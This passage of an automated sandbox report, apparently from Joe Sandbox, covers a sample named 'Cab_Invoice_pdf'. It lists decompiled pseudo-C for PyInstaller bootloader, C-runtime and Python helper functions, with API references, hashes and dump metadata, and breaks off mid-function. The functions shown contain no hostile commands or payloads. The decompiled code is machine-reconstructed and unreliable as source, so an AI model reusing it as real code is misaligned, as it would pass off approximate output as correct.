                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: dffe867397ba665d527c2e4ccea01c2d23e59236fb42a2c769eb9d179c04e0e1
                            • Instruction ID: 93bdbb5c386e00a41ef0e1bbfab3993a0dbfec71828cc0138c1bc439c1b77d31
                            • Opcode Fuzzy Hash: dffe867397ba665d527c2e4ccea01c2d23e59236fb42a2c769eb9d179c04e0e1
                            • Instruction Fuzzy Hash: 5451B3B29043066BE72DE7399C41BFBB79CAF5036CF140929F94882249F725D618C273
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E013135B0(void* __edx, signed int _a8196, intOrPtr _a8204) {
                            				char _v0;
                            				void* __ebx;
                            				intOrPtr __ebp;
                            				signed int _t17;
                            				intOrPtr _t45;
                            				void* _t49;
                            				char* _t52;
                            				intOrPtr* _t54;
                            				signed int _t59;
                            
                            				_t49 = __edx;
                            				E01317880();
                            				_t17 =  *0x133c008; // 0xa212446c
                            				_a8196 = _t17 ^ _t59;
                            				_t45 = _a8204;
                            				_t54 =  *((intOrPtr*)(_t45 + 8));
                            				 *((intOrPtr*)( *0x133c95c)) = 1;
                            				 *((intOrPtr*)( *0x133c958)) = 1;
                            				 *((intOrPtr*)( *0x133c970)) = 1;
                            				 *((intOrPtr*)( *0x133c974)) = 1;
                            				 *((intOrPtr*)( *0x133c96c)) = 1;
                            				_t24 =  *0x133c968;
                            				 *((intOrPtr*)( *0x133c968)) = 0;
                            				if(_t54 >=  *((intOrPtr*)(_t45 + 0xc))) {
                            					L15:
                            					L16:
                            					E0131786A();
                            					return 0;
                            				}
                            				do {
                            					if( *((char*)(_t54 + 0x11)) != 0x6f) {
                            						goto L12;
                            					}
                            					_t52 = _t54 + 0x12;
                            					_t24 = E01319780(_t52, "pyi-", 4);
                            					_t59 = _t59 + 0xc;
                            					if(_t24 == 0) {
                            						goto L12;
                            					}
                            					_t24 =  *_t52 + 0xffffffb1;
                            					if(_t24 > 0x27) {
                            						goto L12;
                            					}
                            					_t7 = _t24 + E01313798; // 0xd2da
                            					switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M01313784))) {
                            						case 0:
                            							__eax =  *0x133c960;
                            							goto L11;
                            						case 1:
                            							__esi + 0x14 =  &_v0;
                            							__eflags = E0131D7BF( &_v0, __esi + 0x14, 0x1000) - 0xffffffff;
                            							if(__eflags == 0) {
                            								__eax = __esi + 0x14;
                            								E01311910(__eflags, "Failed to convert Wflag %s using mbstowcs (invalid multibyte string)\n", __esi + 0x14) = __eax | 0xffffffff;
                            								goto L16;
                            							}
                            							__eax =  &_v0;
                            							_push( &_v0);
                            							__eax =  *0x133c9e0();
                            							__esp = __esp + 4;
                            							goto L12;
                            						case 2:
                            							__ebp = 1;
                            							goto L12;
                            						case 3:
                            							_t24 =  *0x133c968;
                            							L11:
                            							 *_t24 = 1;
                            							goto L12;
                            						case 4:
                            							goto L12;
                            					}
                            					L12:
                            					_push(_t54);
                            					_t54 = _t24;
                            					_t59 = _t59 + 8;
                            				} while (_t54 <  *((intOrPtr*)(_t45 + 0xc)));
                            				if(0 != 0) {
                            					_push(0x8000);
                            					_push(E013209C5(E0131A7EB(0)));
                            					E0131D852(_t45, _t49, 0);
                            					_push(0x8000);
                            					_push(E013209C5(E0131A7EB(1)));
                            					E0131D852(_t45, _t49, 0);
                            					_push(E0131A7EB(1));
                            					E0131DBBF(_t49, 0);
                            					_push(E0131A7EB(2));
                            					E0131DBBF(_t49, 0);
                            					E0131D2BE(E0131A7EB(0), 0);
                            					E0131D2BE(E0131A7EB(1), 0);
                            					E0131D2BE(E0131A7EB(2), 0);
                            					_t59 = _t59 + 0x54;
                            				}
                            				goto L15;
                            			}

                            APIs
                            • PySys_AddWarnOption.PYTHON38(?), ref: 01313688
                            Strings
                            • pyi-, xrefs: 0131362B
                            • Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 0131376F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: OptionSys_Warn
                            • String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
                            • API String ID: 4187674166-3625900369
                            • Opcode ID: 666c41bdf7de9e096ecb0c5b68e38e9c53ef5f2e633aeb55c23729cb5f7d8185
                            • Instruction ID: fdd8f5a7d1d60d0c3ab1e2871f66741040605a88a3bed3f4477847d5e8e170ae
                            • Opcode Fuzzy Hash: 666c41bdf7de9e096ecb0c5b68e38e9c53ef5f2e633aeb55c23729cb5f7d8185
                            • Instruction Fuzzy Hash: 0F415DB19003015BD328BBBCDC85F5677AC7F25329F040814FE09A72CAEA75E5148772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E79ED94,no such name), ref: 6E2F40C3
                            • PyUnicode_FromString.PYTHON38(?), ref: 6E2F40F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: String$Err_FromUnicode_
                            • String ID: no such name
                            • API String ID: 3678473424-4211486178
                            • Opcode ID: 0af948b93d2c98ec9421c8e47411501e5e707f8e3cbdebb95076208a781765fa
                            • Instruction ID: 8b9d4f61ddab0e6b685b0037b9f518e2d2716d4026663da8f5be54e221697741
                            • Opcode Fuzzy Hash: 0af948b93d2c98ec9421c8e47411501e5e707f8e3cbdebb95076208a781765fa
                            • Instruction Fuzzy Hash: 4A014931E5010CDBDB04DBA4ED01AFDB3BDEF05305F1001A9ED0A97201EEA15E1587C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6E2F2830(void* __ecx, signed int __edx) {
                            				signed int _t21;
                            				signed char _t22;
                            				void* _t24;
                            				signed int _t29;
                            				void* _t30;
                            				signed int _t31;
                            				void* _t33;
                            
                            				_t29 = __edx;
                            				_t30 = __ecx;
                            				if(__edx < 0x110000) {
                            					_t21 =  *(0x6e3cd570 + ((( *(0x6e398078 + (__edx >> 7) * 2) & 0x0000ffff) << 7) + (__edx & 0x0000007f)) * 2) & 0x0000ffff;
                            				} else {
                            					_t21 = 0;
                            				}
                            				_t22 = _t21 + _t21 * 2;
                            				_t31 =  *(0x6e32d854 + _t22 * 2) & 0x000000ff;
                            				if(_t30 == 0 ||  *((intOrPtr*)(_t30 + 4)) != 0x6e3f8128) {
                            					L9:
                            					__imp__PyUnicode_FromString( *((intOrPtr*)(_t31 * 4 + "Xb/n\\b/n`b/ndb/nhb/nlb/n")));
                            					return _t22;
                            				} else {
                            					_t24 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0xc))))(_t29);
                            					_t33 = _t33 + 4;
                            					if( *((char*)(_t24 + 1)) != 0) {
                            						_t22 =  *((intOrPtr*)(_t24 + 4));
                            						if(_t22 != 0xff) {
                            							_t31 = _t22 & 0x000000ff;
                            						}
                            						goto L9;
                            					} else {
                            						__imp__PyUnicode_FromString( *((intOrPtr*)(0 + "Xb/n\\b/n`b/ndb/nhb/nlb/n")));
                            						return _t24;
                            					}
                            				}
                            			}

                            APIs
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F288F
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F28AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FromStringUnicode_
                            • String ID: Xb/n\b/n`b/ndb/nhb/nlb/n
                            • API String ID: 2818169177-1585766530
                            • Opcode ID: d0e25e66c5b746f5dd10d5ece357e1d7cffab875717632448742467f954b223a
                            • Instruction ID: 6f786e917d6583c341b5879f8595a1bdd9f2e6627586dcaeb13c4aac9fd3250b
                            • Opcode Fuzzy Hash: d0e25e66c5b746f5dd10d5ece357e1d7cffab875717632448742467f954b223a
                            • Instruction Fuzzy Hash: 9C019CF2D6047ADFCB400B9CE4086697BA79FC36117090039E08547124EA25C4A7C6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyUnicode_ToDecimalDigit.PYTHON38 ref: 6E2F252F
                            • PyErr_SetString.PYTHON38(6E79ED94,not a decimal), ref: 6E2F254F
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DecimalDigitErr_StringUnicode_
                            • String ID: not a decimal
                            • API String ID: 2362873022-3590249192
                            • Opcode ID: 54dc7f4be1437a02d7ccaff90b14f19795e5e1caacc073543e06fcea4189097d
                            • Instruction ID: 68f780d6c5cc3243e8f9ebe23ba0016162f81092bb4f14e6245d1308ed59c5ff
                            • Opcode Fuzzy Hash: 54dc7f4be1437a02d7ccaff90b14f19795e5e1caacc073543e06fcea4189097d
                            • Instruction Fuzzy Hash: 61F02DB21D515ADFDB054BD8F858A95B7AADF03227B0840B5E40DCB212F322D513C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyUnicode_ToDigit.PYTHON38 ref: 6E2F2574
                            • PyErr_SetString.PYTHON38(6E79ED94,not a digit), ref: 6E2F2594
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DigitErr_StringUnicode_
                            • String ID: not a digit
                            • API String ID: 1987352478-3016634541
                            • Opcode ID: 8e43bcc6a2b96b17e994c0ab81a5a6792c10a94486d24789e76c4d85de8a6488
                            • Instruction ID: deb6a7f5e582100a1bf68e32b380f58ed45b7ca5361fdfc315db9258387d2b60
                            • Opcode Fuzzy Hash: 8e43bcc6a2b96b17e994c0ab81a5a6792c10a94486d24789e76c4d85de8a6488
                            • Instruction Fuzzy Hash: 1EE04F716A4509DFEB009FA4E88991537BAFB4266A7144075ED0ECA212F732D128DBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131D646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                            				char* _v8;
                            				int _v12;
                            				char _v16;
                            				char _v24;
                            				char _v28;
                            				void* __ebx;
                            				char _t34;
                            				int _t35;
                            				int _t38;
                            				long _t39;
                            				char* _t42;
                            				int _t44;
                            				int _t47;
                            				int _t53;
                            				intOrPtr _t55;
                            				void* _t56;
                            				char* _t57;
                            				char* _t62;
                            				char* _t63;
                            				void* _t64;
                            				int _t65;
                            				short* _t67;
                            				short* _t68;
                            				int _t69;
                            				intOrPtr* _t70;
                            
                            				_t64 = __edx;
                            				_t53 = _a12;
                            				_t67 = _a4;
                            				_t68 = 0;
                            				if(_t67 == 0) {
                            					L3:
                            					if(_a8 != _t68) {
                            						E0131AFAE(_t53,  &_v28, _t64, _a16);
                            						_t34 = _v24;
                            						__eflags = _t67;
                            						if(_t67 == 0) {
                            							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            								_t69 = _t68 | 0xffffffff;
                            								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                            								__eflags = _t35;
                            								if(_t35 != 0) {
                            									L29:
                            									_t28 = _t35 - 1; // -1
                            									_t69 = _t28;
                            									L30:
                            									__eflags = _v16;
                            									if(_v16 != 0) {
                            										_t55 = _v28;
                            										_t31 = _t55 + 0x350;
                            										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                            										__eflags =  *_t31;
                            									}
                            									return _t69;
                            								}
                            								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            								goto L30;
                            							}
                            							_t70 = _a8;
                            							_t56 = _t70 + 1;
                            							do {
                            								_t38 =  *_t70;
                            								_t70 = _t70 + 1;
                            								__eflags = _t38;
                            							} while (_t38 != 0);
                            							_t69 = _t70 - _t56;
                            							goto L30;
                            						}
                            						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                            						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                            							_t69 = _t68 | 0xffffffff;
                            							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                            							__eflags = _t35;
                            							if(_t35 != 0) {
                            								goto L29;
                            							}
                            							_t39 = GetLastError();
                            							__eflags = _t39 - 0x7a;
                            							if(_t39 != 0x7a) {
                            								L21:
                            								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
                            								 *_t67 = 0;
                            								goto L30;
                            							}
                            							_t42 = _a8;
                            							_t57 = _t42;
                            							_v8 = _t57;
                            							_t65 = _t53;
                            							__eflags = _t53;
                            							if(_t53 == 0) {
                            								L20:
                            								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                            								__eflags = _t44;
                            								if(_t44 != 0) {
                            									_t69 = _t44;
                            									goto L30;
                            								}
                            								goto L21;
                            							} else {
                            								goto L15;
                            							}
                            							while(1) {
                            								L15:
                            								_t45 =  *_t57;
                            								_v12 = _t65 - 1;
                            								__eflags =  *_t57;
                            								if(__eflags == 0) {
                            									break;
                            								}
                            								_t47 = E01325F84(__eflags, _t45 & 0x000000ff,  &_v24);
                            								_t62 = _v8;
                            								__eflags = _t47;
                            								if(_t47 == 0) {
                            									L18:
                            									_t65 = _v12;
                            									_t57 = _t62 + 1;
                            									_v8 = _t57;
                            									__eflags = _t65;
                            									if(_t65 != 0) {
                            										continue;
                            									}
                            									break;
                            								}
                            								_t62 = _t62 + 1;
                            								__eflags =  *_t62;
                            								if( *_t62 == 0) {
                            									goto L21;
                            								}
                            								goto L18;
                            							}
                            							_t42 = _a8;
                            							goto L20;
                            						}
                            						__eflags = _t53;
                            						if(_t53 == 0) {
                            							goto L30;
                            						}
                            						_t63 = _a8;
                            						while(1) {
                            							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                            							__eflags =  *(_t68 + _t63);
                            							if( *(_t68 + _t63) == 0) {
                            								goto L30;
                            							}
                            							_t68 =  &(_t68[0]);
                            							_t67 =  &(_t67[1]);
                            							__eflags = _t68 - _t53;
                            							if(_t68 < _t53) {
                            								continue;
                            							}
                            							goto L30;
                            						}
                            						goto L30;
                            					}
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					return E01321788() | 0xffffffff;
                            				}
                            				if(_t53 != 0) {
                            					 *_t67 = 0;
                            					goto L3;
                            				}
                            				return 0;
                            			}





























                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 0131D6DC
                            • GetLastError.KERNEL32 ref: 0131D6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0131D745
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction ID: 444b596832ea90282e26e2333ef3e722be24a61a2ae4c9c4c85aea112fd5360e
                            • Opcode Fuzzy Hash: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction Fuzzy Hash: E541F931600286AFDB2A9FECC84CBAEBBB9EF43328F144169F95957199D7318901C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Control-flow Graph

                            C-Code - Quality: 73%
                            			E00BCE260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _v16;
                            				struct _SYSTEMTIME _v32;
                            				struct _SYSTEMTIME _v48;
                            				char _v556;
                            				char _v580;
                            				char _v588;
                            				char _v596;
                            				struct _WIN32_FIND_DATAW _v604;
                            				signed int* _v632;
                            				void* _v636;
                            				signed int _v648;
                            				FILETIME* _v1260;
                            				signed int _v1272;
                            				signed int _t54;
                            				WCHAR* _t56;
                            				signed int _t59;
                            				signed int _t60;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t67;
                            				void* _t71;
                            				signed int _t73;
                            				void* _t75;
                            				signed int _t77;
                            				signed int _t78;
                            				int _t79;
                            				signed int _t84;
                            				signed int _t85;
                            				signed int _t86;
                            				signed int _t92;
                            				FILETIME* _t94;
                            				signed int _t95;
                            				long _t104;
                            				long _t105;
                            				signed int _t106;
                            				signed int _t119;
                            				signed int _t122;
                            				signed int* _t125;
                            				signed int* _t127;
                            				void* _t129;
                            				void* _t130;
                            				signed int _t131;
                            				signed int _t132;
                            				void* _t134;
                            				signed int _t135;
                            				void* _t136;
                            				signed int _t137;
                            
                            				_t119 = __edx;
                            				_t54 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t54 ^ _t131;
                            				_t56 = _a4;
                            				_push(__esi);
                            				_t125 = _a8;
                            				if(_t125 != 0) {
                            					if(_t56 == 0) {
                            						goto L1;
                            					} else {
                            						_push(__ebx);
                            						_t60 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0); // executed
                            						_t122 = _t60;
                            						if(_t122 != 0xffffffff) {
                            							asm("sbb eax, eax");
                            							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
                            							_t65 =  &_v596;
                            							_push(_t65); // executed
                            							L33(); // executed
                            							_t125[2] = _t65;
                            							_t66 =  &_v588;
                            							_push(_t66);
                            							_t125[3] = _t119;
                            							L33(); // executed
                            							_t125[4] = _t66;
                            							_t67 =  &_v580;
                            							_push(_t67);
                            							_t125[5] = _t119;
                            							L33(); // executed
                            							_t125[6] = _t67;
                            							_t125[8] = _v604.dwReserved0;
                            							_t125[7] = _t119;
                            							_t71 = E00BD618C( &(_t125[9]), 0x104,  &_v556);
                            							_t135 = _t134 + 0x18;
                            							if(_t71 != 0) {
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								E00BD1798();
                            								asm("int3");
                            								_push(_t131);
                            								_t132 = _t135;
                            								_t136 = _t135 - 0x254;
                            								_t73 =  *0xbec008; // 0xdc55bb75
                            								_v648 = _t73 ^ _t132;
                            								_t75 = _v636;
                            								_push(_t125);
                            								_t127 = _v632;
                            								if(_t75 != 0) {
                            									if(_t75 == 0xffffffff || _t127 == 0) {
                            										goto L18;
                            									} else {
                            										_t79 = FindNextFileW(_t75,  &_v604); // executed
                            										if(_t79 != 0) {
                            											asm("sbb eax, eax");
                            											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
                            											_t84 =  &(_v604.ftCreationTime);
                            											_push(_t84);
                            											L33();
                            											_t127[2] = _t84;
                            											_t85 =  &(_v604.ftLastAccessTime);
                            											_push(_t85);
                            											_t127[3] = _t119;
                            											L33();
                            											_t127[4] = _t85;
                            											_t86 =  &(_v604.ftLastWriteTime);
                            											_push(_t86);
                            											_t127[5] = _t119;
                            											L33();
                            											_t127[6] = _t86;
                            											_t127[8] = _v604.nFileSizeLow;
                            											_t127[7] = _t119;
                            											_t78 = E00BD618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
                            											_t137 = _t136 + 0x18;
                            											if(_t78 == 0) {
                            												goto L20;
                            											} else {
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												E00BD1798();
                            												asm("int3");
                            												_push(_t132);
                            												_t92 =  *0xbec008; // 0xdc55bb75
                            												_v1272 = _t92 ^ _t137;
                            												_t94 = _v1260;
                            												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
                            													_t94 = FileTimeToSystemTime(_t94,  &_v48);
                            													if(_t94 == 0) {
                            														goto L35;
                            													} else {
                            														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32); // executed
                            														if(_t94 == 0) {
                            															goto L35;
                            														} else {
                            															_push(0xffffffff);
                            															_push(_v32.wSecond & 0x0000ffff);
                            															_t95 = E00BD56B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff); // executed
                            														}
                            													}
                            												} else {
                            													L35:
                            													_t95 = _t94 | 0xffffffff;
                            												}
                            												E00BC786A();
                            												return _t95;
                            											}
                            										} else {
                            											_t104 = GetLastError();
                            											_t129 = 2;
                            											if(_t104 < _t129) {
                            												L28:
                            												_t77 = E00BCC9CE();
                            												 *_t77 = 0x16;
                            												goto L19;
                            											} else {
                            												if(_t104 <= 3) {
                            													L30:
                            													_t77 = E00BCC9CE();
                            													 *_t77 = _t129;
                            													goto L19;
                            												} else {
                            													if(_t104 == 8) {
                            														_t77 = E00BCC9CE();
                            														 *_t77 = 0xc;
                            														goto L19;
                            													} else {
                            														if(_t104 == 0x12) {
                            															goto L30;
                            														} else {
                            															goto L28;
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									L18:
                            									 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            									_t77 = E00BD1788();
                            									L19:
                            									_t78 = _t77 | 0xffffffff;
                            									L20:
                            									E00BC786A();
                            									return _t78;
                            								}
                            							} else {
                            								_t59 = _t122;
                            								goto L10;
                            							}
                            						} else {
                            							_t105 = GetLastError();
                            							_t130 = 2;
                            							if(_t105 < _t130) {
                            								L8:
                            								_t106 = E00BCC9CE();
                            								 *_t106 = 0x16;
                            							} else {
                            								if(_t105 <= 3) {
                            									L13:
                            									_t106 = E00BCC9CE();
                            									 *_t106 = _t130;
                            								} else {
                            									if(_t105 == 8) {
                            										_t106 = E00BCC9CE();
                            										 *_t106 = 0xc;
                            									} else {
                            										if(_t105 == 0x12) {
                            											goto L13;
                            										} else {
                            											goto L8;
                            										}
                            									}
                            								}
                            							}
                            							_t59 = _t106 | 0xffffffff;
                            							L10:
                            							goto L11;
                            						}
                            					}
                            				} else {
                            					L1:
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					_t59 = E00BD1788() | 0xffffffff;
                            					L11:
                            					E00BC786A();
                            					return _t59;
                            				}
                            			}





















































                            APIs
                            • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00BCE2A9
                            • GetLastError.KERNEL32 ref: 00BCE2B6
                              • Part of subcall function 00BCE4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00BCE328,?), ref: 00BCE4D2
                              • Part of subcall function 00BCE4A6: SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00BCE328,?,?,?,?,00BCE328,?), ref: 00BCE4E6
                            • FindNextFileW.KERNELBASE(?,?,?), ref: 00BCE3DC
                            • GetLastError.KERNEL32 ref: 00BCE3E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: d8383f7d390e8914874baed9cd23e6f7a172f74f62623f8a52cc1dc8c19a67a8
                            • Instruction ID: c8e27a41ee008c7659ea16d4f282a29c8d79e6f9ab7952f3b1d49ba3ad9452bc
                            • Opcode Fuzzy Hash: d8383f7d390e8914874baed9cd23e6f7a172f74f62623f8a52cc1dc8c19a67a8
                            • Instruction Fuzzy Hash: 32616371900618DBC725AF64CC85FAEB7E8EF45310F100ADEF466DB291EA74E9848B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD0158(int _a4) {
                            				void* _t7;
                            				void* _t14;
                            
                            				_t7 = E00BD3A8A(_t14); // executed
